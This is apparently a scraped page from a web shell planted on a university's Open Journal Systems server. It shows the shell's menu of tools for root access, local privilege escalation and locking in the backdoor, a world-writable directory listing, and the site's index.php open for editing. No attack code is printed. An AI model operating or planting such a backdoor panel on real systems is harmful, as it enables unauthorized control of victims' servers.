Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.21.241.17
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
ejournal_unsap /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
api
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
cache
[ DIR ]
drwxrwxrwx
2024-06-05 20:37
cgi-bin
[ DIR ]
drwxrwxrwx
2021-10-28 15:36
classes
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
controllers
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
dbscripts
[ DIR ]
drwxrwxrwx
2023-06-07 23:30
docs
[ DIR ]
drwxrwxrwx
2024-09-12 18:45
dsa
[ DIR ]
drwxrwxrwx
2024-09-21 22:52
files
[ DIR ]
drwxrwxrwx
2024-01-19 14:04
js
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
lib
[ DIR ]
drwxrwxrwx
2024-08-21 20:14
locale
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
pages
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
plugins
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
registry
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
schemas
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
styles
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
templates
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
tools
[ DIR ]
drwxrwxrwx
2023-06-07 23:29
.DS_Store
6
KB
-rw-rw-rw-
2022-06-27 11:25
.ftpquota
16
B
-rw-rw-rw-
2023-04-18 05:39
.htaccess
144
B
-rw-rw-rw-
2024-02-13 09:49
README.md
2.22
KB
-rw-rw-rw-
2022-06-27 11:25
cache.zip
2.61
MB
-rw-rw-rw-
2023-06-08 20:51
config.TEMPLATE.inc.php
16.27
KB
-rw-rw-rw-
2022-06-27 11:25
config.inc.php
16.38
KB
-rw-rw-rw-
2024-02-14 12:37
config_bua.inc.php
16.08
KB
-rw-rw-rw-
2022-06-25 16:35
cypress.json
734
B
-rw-rw-rw-
2022-06-27 11:25
error_log
180.72
MB
-rw-rw-rw-
2023-06-08 00:47
favicon.ico
1.12
KB
-rw-rw-rw-
2022-06-27 11:25
googlea1919ab817f4ec66.html
53
B
-rw-rw-rw-
2023-06-08 00:59
index.php
2.9
KB
-rw-rw-rw-
2022-06-27 11:25
robots.txt
32
B
-rw-rw-rw-
2022-06-27 11:25
web.config
993
B
-rw-rw-rw-
2023-06-09 00:45
Save
Rename
<?php /** * @mainpage OJS API Reference * * Welcome to the OJS API Reference. This resource contains documentation * generated automatically from the OJS source code. * * The design of Open %Journal Systems is heavily structured for * maintainability, flexibility and robustness. Those familiar with Sun's * Enterprise Java Beans technology or the Model-View-Controller (MVC) pattern * will note similarities. * * As in a MVC structure, data storage and representation, user interface * presentation, and control are separated into different layers. The major * categories, roughly ordered from "front-end" to "back-end," follow: * - Smarty templates, which are responsible for assembling HTML pages to * display to users; * - Page classes, which receive requests from users' web browsers, delegate * any required processing to various other classes, and call up the * appropriate Smarty template to generate a response; * - Controllers, which implement reusable pieces of content e.g. for AJAX * subrequests. * - Action classes, which are used by the Page classes to perform non-trivial * processing of user requests; * - Model classes, which implement PHP objects representing the system's * various entities, such as Users, Articles, and Journals; * - Data Access Objects (DAOs), which generally provide (amongst others) * update, create, and delete functions for their associated Model classes, * are responsible for all database interaction; * - Support classes, which provide core functionalities, miscellaneous common; * * Additionally, many of the concerns shared by multiple PKP applications are * implemented in the shared "pkp-lib" library, shipped in the lib/pkp * subdirectory. The same conventions listed above apply to lib/pkp as well. * * As the system makes use of inheritance and has consistent class naming * conventions, it is generally easy to tell what category a particular class * falls into. * * For example, a Data Access Object class always inherits from the DAO class, * has a Class name of the form [Something]%DAO, and has a filename of the form * [Something]%DAO.inc.php. * * To learn more about developing OJS, there are several additional resources * that may be useful: * - The docs/README.md document * - The PKP support forum at https://forum.pkp.sfu.ca/ * - Documentation available at https://docs.pkp.sfu.ca/dev/ * * @file ojs/index.php * * Copyright (c) 2014-2021 Simon Fraser University * Copyright (c) 2003-2021 John Willinsky * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING. * * @ingroup index * * Bootstrap code for OJS site. Loads required files and then calls the * dispatcher to delegate to the appropriate request handler. */ // Initialize global environment define('INDEX_FILE_LOCATION', __FILE__); $application = require('./lib/pkp/includes/bootstrap.inc.php'); // Serve the request $application->execute();